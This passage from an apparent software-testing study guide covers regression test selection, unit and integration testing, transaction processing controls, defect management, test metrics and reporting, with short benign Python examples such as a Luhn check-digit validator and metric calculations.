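ts3 = {"TC-101", "TC-102"}     # new tests for the new functionality (Steps 5-6)

ts4 = ts2 | ts3                # full suite exercising all of V2 (Step 7)
print(sorted(ts4))
```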
To perform selective regression testing, each change must be analyzed and the impact on other
system components assessed. A process for analyzing changes is:
• Identify each changed component. A component may be a SCREEN, REPORT, DATA ELEMENT, DATA-FLOW PROCESS, etc.
• Identify the nature of the change and its relationship to other affected components. Use
of data flow diagrams, case repositories, or other tools which cross-reference or relate
components is helpful.
• If the changes are “local” (i.e., processes, data flows, and I/Os), then only the
unchanged portions of those components need to be regression tested.
• If the changes are “global” (i.e., existing, new, deleted data elements, data element
rules, values/validation, data store layouts, global variables, table contents, etc.), then
all components related to those components must be regression tested.
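A minimal sketch of this impact analysis is shown below: a cross-reference of components to the test cases that exercise them is used to select the regression subset. The component names, test identifiers, and the sets of changed and related components are illustrative assumptions.

```python
# Cross-reference of components to the test cases that exercise them.
component_to_tests = {
    "CUSTOMER_SCREEN": {"TC-010", "TC-011"},
    "INVOICE_REPORT":  {"TC-020"},
    "DISCOUNT_RULE":   {"TC-011", "TC-030", "TC-031"},
}

# Components touched by the change, plus components related to them
# (e.g., identified from data flow diagrams or a case repository).
changed = {"DISCOUNT_RULE"}
related = {"INVOICE_REPORT"}   # uses the changed data element

impacted_tests = set()
for component in changed | related:
    impacted_tests |= component_to_tests.get(component, set())

print("Regression subset:", sorted(impacted_tests))
```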
There is no universal definition of a unit; it depends on the technologies and scope of work. A
unit can be:
• One program module
• One function/feature
• In Object-Oriented:
A Class or
The functionality implemented by a method
• A window or elements of a window
• A web page
• A Java applet or servlet
• An Active Server Page (ASP)
• A Dynamic Link Library (DLL) object
• A Common Gateway Interface (CGI) script
Ideally, the developer is in the best position to perform unit testing. The developer is able to test both function and structure, and from a dynamic testing point of view unit testing is the earliest opportunity to test.
However, there are challenges for developers. Often developers lack objectivity because they are so closely tied to the code. In addition, the pressure of meeting extremely tight schedules, a lack of training in test techniques, and few if any processes, environments, or tools for testing all cause issues. John Dodson, manager of software engineering at Lockheed
Martin stated that, “Most of the college folks I get have a real good background in building
software and a horrible background in testing it.”
The procedural flow of unit testing is not dissimilar from other testing phases. It is what is
tested that differs. The majority of white-box testing techniques discussed in section 7.4.1
(e.g., statement testing) are used most often in unit testing.
Another concern the development team must consider as part of the development, unit test, and fix process is software entropy: the tendency for software, over time, to become difficult and costly to maintain. It is by the very nature of software that systems tend to
undergo continuous change resulting in systems that become more complex and disorganized.
Software refactoring is the process of improving the design of existing software code.
Refactoring doesn't change the observable behavior of the software; it improves its internal
structure. For example, if a programmer wants to add new functionality to a program, they
may decide to refactor the program first to simplify the addition of new functionality and to
prevent software entropy.
The top down approach requires stubs for each lower component and only one “top level”
driver is needed. Stubs can be difficult to develop and may require changes for different test
cases.
The bottom up approach begins with the components with the fewest dependencies. A driver
causes the component under test to exercise the interfaces. As you move up the drivers are
replaced with the actual components.
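As a hedged illustration of a stub, the Python sketch below exercises a top-level component while a lower-level dependency that is not yet available is replaced with a canned response using unittest.mock; the module and function names are assumptions.

```python
from unittest import mock

def calculate_invoice_total(order_id):
    # Top-level component under test; it calls a lower-level component that
    # may not exist yet or may be too costly to invoke during unit testing.
    items = fetch_order_items(order_id)
    return sum(item["qty"] * item["unit_price"] for item in items)

def fetch_order_items(order_id):
    raise NotImplementedError("lower-level component not yet integrated")

def test_calculate_invoice_total():
    stub_items = [{"qty": 2, "unit_price": 5.0}, {"qty": 1, "unit_price": 3.5}]
    # The stub stands in for the missing lower-level component.
    with mock.patch(f"{__name__}.fetch_order_items", return_value=stub_items):
        assert calculate_invoice_total("ORD-1") == 13.5

test_calculate_invoice_total()
```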
• When a defect is fixed and migrated to the test environment, re-test and validate the
fix. If the defect is fixed, close the defect. If the defect is not fixed, return it to the
developer for additional work.
The system test focuses on determining whether the requirements have been implemented
correctly. This includes verifying that users can respond appropriately to events such as
month-end processing, year-end processing, business holidays, promotional events,
transaction processing, error conditions, etc.
In web and mobile testing, the test team must also prove that the application runs successfully
on all supported hardware and software environments. This can be very complex with
applications that must also support various web browsers and mobile devices.
COTS software is normally developed prior to an organization selecting that software for its
use. For smaller, less expensive software packages the software is normally “shrink wrapped”
and is purchased as is. As the COTS software becomes larger and more expensive, the
contracting organization may be able to specify modifications to the software.
On most software test projects the probability of everything going exactly as planned is small.
Scope creep, development delays, and other intervening events may require that the test plan
be updated during the test execution process to keep the plan aligned with the reality of the
project. This contingency would have been planned for in the test plan. Regardless of why a change is necessary, what is critical is that the impact on project risk be identified and documented, and that all stakeholders sign off on the changes.
Auditors state that without strong environmental controls the transaction processing controls
may not be effective. For example, if passwords needed to access computer systems (a
transactional control) are not adequately protected (environmental control) the password
system will not work. Individuals will either protect or not protect their password based on
environmental controls such as the attention management pays to password protection, the
monitoring of the use of passwords that exist, and management’s actions regarding individual
worker’s failure to protect passwords.
Two examples of management controls are the review and approval of a new system and
limiting computer room access.
• Review and Approval of a New System
This control should be exercised to ensure management properly reviews and
approves new IT systems and conversion plans. This review team examines
requests for action, arrives at decisions, resolves conflicts, and monitors the
development and implementation of system projects. It also oversees user
performance to determine whether objectives and benefits agreed to at the
beginning of a system development project are realized.
The team should establish guidelines for developing and implementing system
projects and define appropriate documentation for management summaries. They
Because these two systems are designed as a single system, most testers do not conceptualize
the two systems. Adding to the difficulty is that the system documentation is not divided into
the system that processes transactions and the system that controls the processing of
transactions.
When one visualizes a single system, one has difficulty in visualizing the total system of
control. For example, if one looks at edits of input data by themselves, it is difficult to see how
the totality of control over the processing of a transaction is implemented. Consider, for instance, the risk that invalid transactions will be processed. This risk occurs throughout the system and
not just during the editing of data. When the system of controls is designed it must address all
of the risks of invalid processing from the point that a transaction is entered into the system to
the point that the output deliverable is used for business purposes.
A point to keep in mind when designing tests of controls is that some input errors may be
acceptable if they do not cause an interruption in the application’s processing. A simple
example of this would be a misspelled description of an item. In deciding on controls, it is
necessary to compare the cost of correcting an error to the consequences of accepting it. Such
trade-offs must be determined for each application. Unfortunately there are no universal
guidelines available.
It is important that the responsibility for control over transaction processing be separated as
follows:
• Initiation and authorization of a transaction
• Recording of the transaction
• Custody of the resultant asset
In addition to safeguarding assets, this division of responsibilities provides for the efficiencies
derived from specialization, makes possible a cross-check that promotes accuracy without
duplication or wasted effort, and enhances the effectiveness of a management control system.
The objectives of transaction processing controls are to prevent, detect, or correct incorrect
processing. Preventive controls will stop incorrect processing from occurring; detective
controls identify incorrect processing; and corrective controls correct incorrect processing.
Since the potential for errors is always assumed to exist, the objectives of transaction
processing controls will be summarized in five positive statements:
• Assure that all authorized transactions are completely processed once and only once.
• Assure that transaction data is complete and accurate.
• Assure that transaction processing is correct and appropriate to the circumstances.
• Assure that processing results are utilized for the intended benefits.
• Assure that the application can continue to function.
In most instances controls can be related to multiple exposures. A single control can also
fulfill multiple control objectives. For these reasons transaction processing controls have been
classified according to whether they prevent, detect, or correct causes of exposure. The
controls listed in the next sections are not meant to be exhaustive but, rather, representative of
these types of controls.
Preventive controls act as a guide to help things happen as they should. This type of control is
most desirable because it stops problems from occurring. Application designers should put
their control emphasis on preventive controls. It is more economical and better for human
relations to prevent a problem from occurring than to detect and correct the problem after it
has occurred.
One question that may be raised is, “At what point in the processing flow is it most desirable
to exercise computer data edits?” The answer to this question is simply, “As soon as possible,
in order to uncover problems early and avoid unnecessary computer processing.”
Preventive controls are located throughout the entire application. Many of these controls are
executed prior to the data entering the program’s flow. The following preventive controls will
be discussed in this section:
• Data input
• Turn-around documents
• Pre-numbered forms
• Input validation
• Computer updating of files
• Controls over processing
Data Input - The data input process is typically a manual operation; control is needed to
ensure that the data input has been performed accurately.
Pre-Numbered Form - Sequential numbering of the input transaction with full accountability
at the point of document origin is another traditional control technique. This can be done by
using pre-numbered physical forms or by having the application issue sequential numbers.
Input Validation - An important segment of input processing is the validation of the input
itself. This is an extremely important process because it is really the last point in the input
preparation where errors can be detected before processing occurs. The primary control
techniques used to validate the data are associated with the editing capabilities of the
application. Editing involves the ability to inspect and accept (or reject) transactions
according to validity or reasonableness of quantities, amounts, codes, and other data contained
in input records. The editing ability of the application can be used to detect errors in input
preparation that have not been detected by other control techniques.
The editing ability of the application is achieved by installing checks in the program of
instructions, hence the term program checks. They include:
• Validity tests - Validity tests are used to ensure that transactions contain valid transaction
codes, valid characters, and valid field size.
• Completeness tests - Completeness checks are made to ensure that the input has the
prescribed amount of data in all data fields. For example, a particular payroll application
requires that each new employee hired have a unique User ID and password. A check may
also be included to see that all characters in a field are either numeric or alphabetic.
• Logical tests - Logical checks are used in transactions where various portions, or fields, of
the record bear some logical relationship to one another. An application can check these
logical relationships to reject combinations that are erroneous even though the individual
values are acceptable.
• Limit tests - Limit tests are used to test record fields to see whether certain predetermined
limits have been exceeded. Generally, reasonable time, price, and volume conditions can be
associated with a business event.
• Self-checking digits - Self-checking digits are used to ensure the accuracy of identification numbers such as credit card numbers. A check digit is determined by performing some arithmetic operation on the identification number itself. The arithmetic operation is formed in such a way that typical errors encountered in transcribing a number (such as transposing two digits) will be detected (see the sketch following this list).
• Control totals - Control totals serve as a check on the completeness of the transaction
being processed. Control totals are normally obtained from batches of input data. For
example, daily batch control totals may be emailed to a company allowing them to cross
check with the credit card receipts for that day.
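The check-digit sketch referenced above is shown here using the Luhn algorithm, which is commonly applied to credit card numbers; the sample numbers are illustrative.

```python
def luhn_valid(number: str) -> bool:
    digits = [int(ch) for ch in number if ch.isdigit()]
    total = 0
    # Walk right to left, doubling every second digit (subtract 9 if > 9).
    for position, digit in enumerate(reversed(digits)):
        if position % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0

print(luhn_valid("79927398713"))  # True  - valid check digit
print(luhn_valid("79927398731"))  # False - two digits transposed
```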
Computer Updating of Files - The updating phase of the processing cycle entails the
computer updating files with the validated transactions. Normally computer updating involves
sequencing transactions, comparing transaction records with master-file records,
computations, and manipulating and reformatting data, for the purpose of updating master
files and producing output data for distribution to user departments for subsequent processing.
Controls over Processing - When we discussed input validation, we saw that programmed
controls are a very important part of application control. Programmed controls in computer
updating of files are also very important since they are designed to detect loss of data, check
arithmetic computation, and ensure the proper posting of transactions.
Detective controls alert individuals involved in a process so that they are aware of a problem.
Detective controls should bring potential problems to the attention of individuals so that
action can be taken. One example of a detective control is a listing of all time cards for
individuals who worked over 40 hours in a week. Such a transaction may be correct, or it may
be a systems error, or even fraud.
Detective controls will not prevent problems from occurring, but rather will point out a
problem once it has occurred. Examples of detective controls are batch control documents,
batch serial numbers, clearing accounts, labeling, and so forth.
• Control totals
• Control register
• Documentation and testing
• Output Checks
Control totals - Control totals are normally obtained from batches of input data. These
control totals are prepared manually, prior to processing, and then are incorporated as input to
the data input process. The application can accumulate control totals internally and make a
comparison with those provided as input. A message confirming the comparison should be
printed out, even if the comparison did not disclose an error. These messages are then
reviewed by the respective control group.
Control Register - Another technique to ensure the transmission of data is the recording of
control totals in a log so that the input processing control group can reconcile the input
controls with any control totals generated in subsequent computer processing.
Output Checks - The output checks consist of procedures and control techniques to:
• Reconcile output data, particularly control totals, with previously established control
totals developed in the input phase of the processing cycle
• Review output data for reasonableness and proper format
• Control input data rejected by the computer during processing and distribute the
rejected data to appropriate personnel
Proper input controls and file-updating controls should give a high degree of assurance that
the output generated by the processing is correct. However, it is still useful to have certain
output controls to achieve the control objectives associated with the processing cycle.
Basically, the function of output controls is to determine that the processing does not include
any unauthorized alterations by the computer operations section and that the data is
substantially correct and reasonable.
It should be noted that the corrective process itself is subject to error. Many major problems
have occurred in organizations because corrective action was not taken on detected problems.
Therefore, detective controls should be applied to corrective controls. Examples of corrective
controls are: error detection and re-submission, audit trails, discrepancy reports, error
statistics, and backup and recovery. Error detection and re-submission, and audit trail controls
are discussed below.
• Error Detection and Re-submission - Until now we have talked about data control
techniques designed to screen the incoming data in order to reject any transactions that do
not appear valid, reasonable, complete, etc. Once these errors have been detected, we need
to establish specific control techniques to ensure that all corrections are made to the
transactions in error and that these corrected transactions are reentered into the system.
Such control techniques should include:
Having the control group enter all data rejected from the processing cycle in an
error log by marking off corrections in this log when these transactions are
reentered; open items should be investigated periodically.
Preparing an error input record or report explaining the reason for each rejected
item. This error report should be returned to the source department for correction
and re-submission. This means that the personnel in the originating or source
department should have instructions on the handling of any errors that might occur.
Submitting the corrected transactions through the same error detection and input
validation process as the original transaction.
• Audit Trail Controls - Another important aspect of the processing cycle is the audit trail.
The audit trail consists of documents, journals, ledgers, and worksheets that enable an
interested party (e.g., the auditor) to track an original transaction forward to a summarized
total or from a summarized total backward to the original transaction. Only in this way can
they determine whether the summary accurately reflects the business’s transactions.
In an application system there is a cost associated with each control. The cost of these controls
needs to be evaluated as no control should cost more than the potential errors it is established
to detect, prevent, or correct. Also, if controls are poorly designed or excessive, they become
burdensome and may not be used. The failure to use controls is a key element leading to major
risk exposures.
Preventive controls are generally the lowest in cost. Detective controls usually require some
moderate operating expense. On the other hand, corrective controls are almost always quite
expensive. Prior to installing any control, a cost/benefit analysis should be made. Controls
need to be reviewed continually.
A well-developed defect statement will include each of these attributes. When one or more of
these attributes is missing, questions usually arise, such as:
• Criteria – Why is the current state inadequate?
• Effect – How significant is it?
• Cause – What could have caused the problem?
Documenting the deviation means describing the conditions as they currently exist and the criteria representing what the user desires. The actual deviation is the difference, or gap, between “what is” and “what is desired.”
The statement of condition involves uncovering and documenting the facts as they exist. What is a
fact? If somebody tells you something happened, is that “something” a fact? On the other
hand, is it only a fact if someone told you it’s a fact? The description of the statement of
condition will of course depend largely on the nature and extent of the evidence or support
that is examined and noted. For those facts making up the statement of condition, the IT
professional will obviously take pains to be sure that the information is accurate, well
supported, and worded as clearly and precisely as possible.
• Inputs – The triggers, events, or documents that cause this activity to be executed.
• User/Customers served – The organization, individuals, or class users/customers
serviced by this activity.
• Deficiencies noted – The status of the results of executing this activity and any
appropriate interpretation of those facts.
Table 8-1 is an example of the types of information that should be documented to describe the
defect and document the statement of condition and the statement of criteria. Note that an
additional item could be added to describe the deviation.
Efficiency, economy, and effectiveness are useful measures of effect and frequently can be
stated in quantitative terms such as dollars, time, and units of production, number of
procedures and processes, or transactions. Where past effects cannot be ascertained, potential
future effects may be presented. Sometimes, effects are intangible, but nevertheless of major
significance.
In thought processes, effect is frequently considered almost simultaneously with the first two
attributes of the defect. Testers may suspect a bad effect even before they have clearly
formulated these other attributes in their minds. After the statement of condition is identified
the tester may search for a firm criterion against which to measure the suspected effect.
The tester should attempt to quantify the effect of a defect wherever practical. While the effect
can be stated in narrative or qualitative terms, that frequently does not convey the appropriate
message to management; for example, statements like “Service will be delayed,” do not really
tell what is happening to the organization.
The determination of the cause of a condition usually requires the scientific approach, which
encompasses the following steps:
Step 1. Define the defect (the condition that results in the finding).
Step 2. Identify the flow of work and information leading to the condition.
Step 3. Identify the procedures used in producing the condition.
Step 4. Identify the people involved.
Step 5. Recreate the circumstances to identify the cause of a condition.
It is important to note that the individual whose results are being reported receives those results prior to other parties. This has two advantages for the software tester. First, the individual who the testers believe may have introduced the defect will have the opportunity to confirm or reject that defect. Second, it is important for building good relationships between testers and developers to inform the developer who introduced the defect prior to submitting the
data to other parties. Should the other parties contact the developer in question prior to the
developer receiving the information from the tester, the developer would be put in a difficult
situation. It would also impair the developer-tester relationship.
This section also outlines an approach for defect management. This approach is a synthesis of
the best IT practices for defect management. It is one way to explain a defect management process within an organization.
Although the tester may not be responsible for the entire defect management process, they
need to understand all aspects of defect management. The defect management process
involves these general principles:
• The primary goal is to prevent defects. Where this is not possible or practical, the
goals are to both find the defect as quickly as possible and minimize the impact of the
defect.
• The defect management process, like the entire software development process, should
be risk driven. Strategies, priorities and resources should be based on an assessment of
the risk and the degree to which the expected impact of a risk can be reduced.
• Defect measurement should be integrated into the development process and be used by
the project team to improve the development process. In other words, information on
defects should be captured at the source as a natural by-product of doing the job. It
should not be done after the fact by people unrelated to the project or system.
• As much as possible, the capture and analysis of the information should be automated.
• Defect information should be used to improve the process. This, in fact, is the primary
reason for gathering defect information.
• Imperfect or flawed processes cause most defects. Thus, to prevent defects, the
process must be altered.
Name of the Defect - Name defects according to the phase in which the defect most likely occurred, such as requirements defect, design defect, documentation defect, and so forth.
Defect Type - Indicates the cause of the defect. For example, code defects could be errors in
procedural logic, or code that does not satisfy requirements or deviates from standards.
Defect Class - The following defect categories are suggested for each phase:
• Missing - A specification was not included in the software.
• Wrong - A specification was improperly implemented in the software.
• Extra - An element was included in the software that was not requested by a specification.
If a requirement was not correct because it had not been described completely during the requirements phase of development, the defect might be classified as:
• Name – Requirement defect
• Severity – Minor
• Type - Procedural
• Class – Missing
Skill Category 9
Measurement, Test Status, and Reporting
Management expert Peter Drucker is often quoted as saying that “you can't manage
what you can't measure.” He extends that thought to “if you can’t measure it, you
can’t improve it.” To accomplish both the necessary management of the test project
and the continuous improvement of the test processes, it is important that the tester
understand what and how to collect measures, create metrics and use that data along with
other test results to develop effective test status reports. These reports should show the status
of the testing based on the test plan. Reporting should document what tests have been
performed and the status of those tests. Good test reporting practices are to utilize graphs,
charts, and other pictorial representations when appropriate to help the other project team
members and users interpret the data. The lessons learned from the test effort should be used
to improve the next iteration of the test process.
These are the test processes used by the test team (or other project team members) to perform
static testing. They include, but are not limited to:
• Inspections – A verification of process deliverables against deliverable specifications.
• Reviews – Verification that the process deliverables/phases are meeting the user’s true
needs.
These are the results from dynamic test techniques used by the test team to perform testing.
They include, but are not limited to:
• Functional test cases - The type of tests that will be conducted during the execution of
tests, which will be based on software requirements.
• Structural test cases - The type of tests that will be conducted during the execution of tests, which will be based on validation of the design.
• Non-functional test cases - The type of tests that will be conducted during the
execution of tests which will validate the attributes of the software such as portability,
testability, maintainability, etc.
9.1.1.4 Defects
This category includes a description of the individual defects uncovered during testing.
9.1.1.5 Efficiency
As the Test Plan is being developed, the testers decompose requirements into lower and lower
levels. Conducting testing is normally a reverse of the test planning process. In other words,
testing begins at the very lowest level and the results are rolled up to the highest level. The
final Test Report determines whether the requirements were met. How well documenting,
analyzing, and rolling up test results proceeds depends partially on the process of
decomposing testing through to a detailed level. The roll-up is the exact reverse of the test
strategy and tactics. The efficiency of these processes should be measured.
Two types of efficiency can be evaluated during testing: efficiency of the software system and
efficiency of the test process. If included in the mission of software testing, the testers can
measure the efficiency of both developing and operating the software system. This can involve simple metrics, such as the cost to produce a function point of logic, or complex metrics computed using measurement software.
Measures can be either objective or subjective. An objective measure is a measure that can be
obtained by counting. For example, objective data is hard data, such as defects, hours worked,
and number of completed unit tests. Subjective data are not hard numbers but are generally
perceptions by a person of a product or activity. For example, a subjective measure would
involve such attributes as how easy it is to use and the skill level needed to execute the system.
Before a measure is approved for use, there are certain tests that it must pass, including reliability, validity, ease of use and simplicity, and timeliness. Shown here are tests that each measure and metric should be subjected to before it is approved for use:
Reliability
This refers to the consistency of measurement. If taken by two people, would the same results be obtained?
Timeliness
This refers to whether the data was reported in sufficient time to impact the decisions needed to manage effectively.
Calibration
This indicates the movement of a measure so it becomes more valid, for example, changing a customer survey so it better reflects the true opinions of the customer.
A measure is a single attribute of an entity. It is the basic building block for a measurement
program. Measurement cannot be used effectively until the standard units of measure have
been defined. You cannot intelligently talk about lines of code until the measure lines of code
has been defined. For example, lines of code may mean lines of code written, executable lines
of code written, or even non-compound lines of code written. If a line of code was written that
contained a compound statement, such as a nested IF statement two levels deep, it would be
counted as two or more lines of code.
There are two ways in which quality can drive productivity. The first, and undesirable method,
is to lower or not meet quality standards. For example, if one chose to eliminate the testing
and rework components of a system development process, productivity as measured in lines
of code per hours worked would be increased. This is sometimes done on development
projects under the guise of completing projects on time. While testing and rework may not be
eliminated, they are not complete when the project is placed into production. The second
method for improving productivity through quality is to improve processes so that defects do
not occur, thus minimizing the need for testing and rework.
While there are no generally accepted categories of measures and metrics, it has proved
helpful to many test organizations to establish categories for status and reporting purposes.
In examining many reports prepared by testers the following categories are commonly used:
• Measures unique to test
• Metrics unique to test
• Complexity measurements
• Project metrics
• Size measurements
• Satisfaction metrics
• Productivity metrics
This category includes the basic measures collected during the test process including defect
measures. The following are examples of measures unique to test. Note that all measurements
collected for analysis would be collected using a standardized time frame (e.g., test cycle, test
phase, sprint). Also, time is often referenced in terms of days but could be a different time
factor (e.g., hour, minutes, 10ths of an hour):
• Number of test cases – The number of unique test cases selected for execution.
• Number of test cases executed – The number of unique test cases executed, not
including re-execution of individual test cases.
• Number of test cases passed – The number of unique test cases that currently meet all
the test criteria.
• Number of test cases failed – The number of unique test cases that currently fail to
meet the test criteria.
• Number of test cases blocked – The number of distinct test cases that have not been executed during the testing effort due to an application, configuration, or environmental constraint.
• Number of test cases re-executed – The number of unique test cases that were re-executed, regardless of the number of times they were re-executed.
• Total executions – The total number of test case executions, including re-executions.
• Total number of test case passes – The total number of test case passes, including re-executions of the same test case.
• Total failures – The total number of test case failures, including re-executions of the same test case.
• Number of first run failures – The total number of test cases that failed on the first execution.
• Number of defects found (in testing) – The number of defects uncovered in testing.
• Number of defects found by severity – The number of defects as categorized by
severity (e.g., critical, high, medium, low)
• Number of defects fixed – The number of reported defects that have been corrected
and the correction validated in testing.
• Number of open defects – The number of reported defects that have not been corrected
or the correction has not been validated in testing.
• Number of defects found post-testing – The number of defects found after the
application under test has left the test phase. Typically this would be defects found in
production.
• Defect age – The number of days since the defect was reported.
• Defect aging – The number of days open (defect closed date – defect open date).
• Defect fix time retest – The number of days between the date a corrected defect is
released in the new build and the date the defect is retested.
• Person days – The number of person days expended in the test effort
• Number of test cycles – The number of testing cycles required to complete testing.
• Number of requirements tested – The total number of requirements tested.
• Number of passed requirements – The number of requirements meeting success criteria.
This category includes metrics that are unique to test. Most are computed from the measures
listed in section 9.1.3.5.1. The metrics are (note that “/” represents “divided by”):
• Percent complete – Number of test cases passed / total number of test cases to be
executed.
• Test case coverage – Number of test cases executed / total number of test cases to be
executed.
• Test pass rate – Number of test cases passed / number of test cases executed.
• Test failure rate – Number of test cases failed / number of test cases executed.
• Tests blocked rate – Number of test cases blocked / total test cases
• First run failure rate – Number of first run failures / number of test cases executed.
• Percent defects corrected – Number of closed defects / total number of defects
reported
• Percent rework – (Number of total executions – number of test cases executed) /
number of test cases executed
• Percent bad fixes – (Total failures – first run failures) / first run failures
• Defect discovery rate – Total defects found / person days of test effort
• Defect removal efficiency – Total defects found in testing / (total defects found in
testing + number of defects found post-testing).
• Defect density – Total defects found / standard size measure of application under test
(size measure could be KLOCs, Function points, Story Points)
• Requirements Test Coverage – Number of requirements tested / total number of
requirements
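The Python sketch below computes a few of these metrics from raw test measures; all of the counts are illustrative assumptions.

```python
# Illustrative raw measures collected for one test cycle.
measures = {
    "test_cases_total":      120,
    "test_cases_executed":   110,
    "test_cases_passed":      95,
    "first_run_failures":     20,
    "total_executions":      140,
    "defects_found_testing":  48,
    "defects_found_post":      4,
}

percent_complete    = measures["test_cases_passed"] / measures["test_cases_total"]
test_pass_rate      = measures["test_cases_passed"] / measures["test_cases_executed"]
first_run_fail_rate = measures["first_run_failures"] / measures["test_cases_executed"]
percent_rework      = ((measures["total_executions"] - measures["test_cases_executed"])
                       / measures["test_cases_executed"])
defect_removal_eff  = (measures["defects_found_testing"]
                       / (measures["defects_found_testing"] + measures["defects_found_post"]))

print(f"Percent complete:          {percent_complete:.0%}")
print(f"Test pass rate:            {test_pass_rate:.0%}")
print(f"First run failure rate:    {first_run_fail_rate:.0%}")
print(f"Percent rework:            {percent_rework:.0%}")
print(f"Defect removal efficiency: {defect_removal_eff:.0%}")
```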
This category comprises the status of the project including milestones, budget and schedule
variance and project scope changes. The following are examples of project metrics:
• Percent of budget utilized
• Days behind or ahead of schedule
• Percent of change of project scope
• Percent of project completed (not a budget or schedule metric, but rather an
assessment of the functionality/structure completed at a given point in time)
This category includes methods primarily developed for measuring the size of software
systems, such as lines of code, and function points. These can also be used to measure
software testing productivity. Sizing is important in normalizing data for comparison to other
projects. The following are examples of size metrics:
• KLOC – thousand lines of code; used primarily with statement level languages.
• Function points (FP) – a defined unit of size for software.
• Pages or words of documentation
This category includes the assessment of customers of testing on the effectiveness and
efficiency of testing. The following are examples of satisfaction metrics:
• Ease of use – the amount of effort required to use software and/or software
documentation.
• Customer complaints – some relationship between customer complaints and size of
system or number of transactions processed.
• Customer subjective assessment – a rating system that asks customers to rate their
satisfaction on different project characteristics on a scale.
• Acceptance criteria met – the number of user defined acceptance criteria met at the
time software goes operational.
• User participation in software development – an indication of the user desire to
produce high quality software on time and within budget.
This category includes the effectiveness of test execution. Examples of productivity metrics
are:
• Cost of testing in relation to overall project costs – assumes a commonly accepted
ratio of the costs of development versus tests.
• Under budget/Ahead of schedule.
• Software defects uncovered after the software is placed into an operational status
(measure).
Experience has shown that the analysis and reporting of defects and other software attributes are enhanced when those involved are given analysis and reporting tools. Software quality professionals have recognized the following tools as among the more important analysis tools used by software testers. Some of these analytical tools are built into test automation tool packages. For each tool, its deployment (how to use it) is described, along with examples, results, and recommendations.
9.2.1 Histograms
A histogram is an orderly technique of grouping data by predetermined intervals to show the frequency of the data set. It provides a way to measure and analyze data collected about a process or problem. Pareto charts are a special use of a histogram. When sufficient data on a process is available, a histogram displays the process central point (average), variation (standard deviation, range), and shape of distribution (normal, skewed, or clustered).
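As a simple illustration, the sketch below plots a histogram of hypothetical defect-fix effort data and reports its central point and variation; it assumes the matplotlib library is available and the data values are invented for the example:

# Sketch: plotting a histogram of (hypothetical) defect-fix effort data to see
# the central point, spread, and shape of the distribution.
import statistics
import matplotlib.pyplot as plt

fix_hours = [2, 3, 3, 4, 4, 4, 5, 5, 6, 6, 7, 8, 8, 9, 12, 15]  # hours per defect fix

print("mean:", statistics.mean(fix_hours))
print("std dev:", round(statistics.stdev(fix_hours), 2))

plt.hist(fix_hours, bins=range(0, 18, 2), edgecolor="black")
plt.xlabel("Hours to fix a defect")
plt.ylabel("Frequency")
plt.title("Defect-fix effort histogram")
plt.show()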
A Pareto chart can be used when data is available or can be readily collected from a process.
The use of this tool occurs early in the continuous improvement process when there is a need
to order or rank, by frequency, problems and causes. Team(s) can focus on the vital few
problems and the root causes contributing to these problems. This technique provides the
ability to:
• Categorize items, usually by content or cause factors.
Content: type of defect, place, position, process, time, etc.
Cause: materials, machinery or equipment, operating methods, manpower,
measurements, etc.
• Identify the causes and characteristics that most contribute to a problem.
• Decide which problem to solve or which basic causes of a problem to work on first.
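A minimal sketch of a Pareto chart, again with invented defect counts by cause category, is shown below; categories are ordered largest to smallest and a cumulative-percentage line highlights the vital few (matplotlib assumed):

# Sketch: a simple Pareto chart of defect counts by cause category, using
# hypothetical data. Bars are ordered largest to smallest and a cumulative
# percentage line highlights the "vital few" causes.
import matplotlib.pyplot as plt

defects_by_cause = {
    "Requirements": 42, "Coding": 31, "Interface": 12, "Data": 9, "Environment": 6,
}
causes = sorted(defects_by_cause, key=defects_by_cause.get, reverse=True)
counts = [defects_by_cause[c] for c in causes]
total = sum(counts)
cumulative = [sum(counts[: i + 1]) / total * 100 for i in range(len(counts))]

fig, ax1 = plt.subplots()
ax1.bar(causes, counts, color="steelblue")
ax1.set_ylabel("Defect count")
ax2 = ax1.twinx()
ax2.plot(causes, cumulative, color="darkred", marker="o")
ax2.set_ylabel("Cumulative %")
ax2.set_ylim(0, 110)
plt.title("Pareto chart of defect causes")
plt.show()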
Control charts are used to evaluate variation of a process to determine what improvements are
needed and are meant to be used on a continuous basis to monitor processes.
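One common way to build such a chart is to compute control limits at the mean plus or minus three standard deviations of an in-control baseline and then flag points that fall outside them; the sketch below uses hypothetical daily test-execution counts:

# Sketch: computing control limits (mean +/- 3 standard deviations) from an
# in-control baseline, then checking new observations against those limits.
# Points outside the limits suggest special causes of variation to investigate.
import statistics

baseline = [48, 52, 50, 47, 53, 49, 51, 46, 54, 50]   # in-control history
mean = statistics.mean(baseline)
sigma = statistics.stdev(baseline)
ucl, lcl = mean + 3 * sigma, mean - 3 * sigma

new_points = [49, 51, 71]                              # latest observations
for value in new_points:
    status = "out of control" if (value > ucl or value < lcl) else "in control"
    print(f"{value}: {status}  (LCL={lcl:.1f}, UCL={ucl:.1f})")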
Interim test reports, which indicate the current status of testing, are needed for project management. Those responsible for making project decisions need to know the status
from the tester’s perspective throughout the project. These interim reports can occur in any
phase of the life cycle, at pre-defined checkpoints, or when important information needs to be
conveyed to developers.
The final test reports are prepared at the conclusion of each level of testing. The ones
occurring at the end of unit and integration testing are normally informal and have the primary
purpose of indicating that there are no remaining defects at the end of those test levels. The
test reports at the conclusion of system testing and acceptance testing are primarily for the
customer or user to make decisions regarding whether or not to place the software in
operation. If it is placed in operation with known defects, the user can develop strategies to
address potential weaknesses.
The test reports are designed to report the results of testing as defined in the Test Plan.
Without a well-developed Test Process, which has been executed in accordance with the plan,
it is difficult to develop a meaningful test report.
All final test reports should be designed to accomplish the following three objectives:
• Define the scope of testing – this is normally a brief recap of the Test Plan
• Present the results of testing
• Draw conclusions and recommendations from those test results
The final test report may be a combination of electronic data and printed information. For
example, if the Function Test Matrix is maintained electronically, there is no reason to print
that, as the detail is available electronically if needed. The printed final report will summarize
that data, draw the appropriate conclusions, and present recommendations.
Final test reports also serve these purposes:
• Provide information to the users of the software system so that they can determine whether the system is ready for production; and if so, to assess the potential consequences and initiate appropriate actions to minimize those consequences.
• After implementation, help the project trace problems in the event the application
malfunctions in production. Knowing which functions have been correctly tested and
which ones still contain defects can assist in taking corrective action.
• Use the test results to analyze the test process for the purpose of preventing similar
defects from occurring in the future. Accumulating the results of many test reports to
identify which components of the software development process are defect-prone
provides this historical data, improves the developmental process and, if improved,
could eliminate or minimize the occurrence of high-frequency defects.
There is no generally accepted standard regarding the type, content and frequency of test
reports. However, it is reasonable to assume that some type of report should be issued after the
conclusion of each test activity. This would include reports at the conclusion of these test
activities:
• Unit test
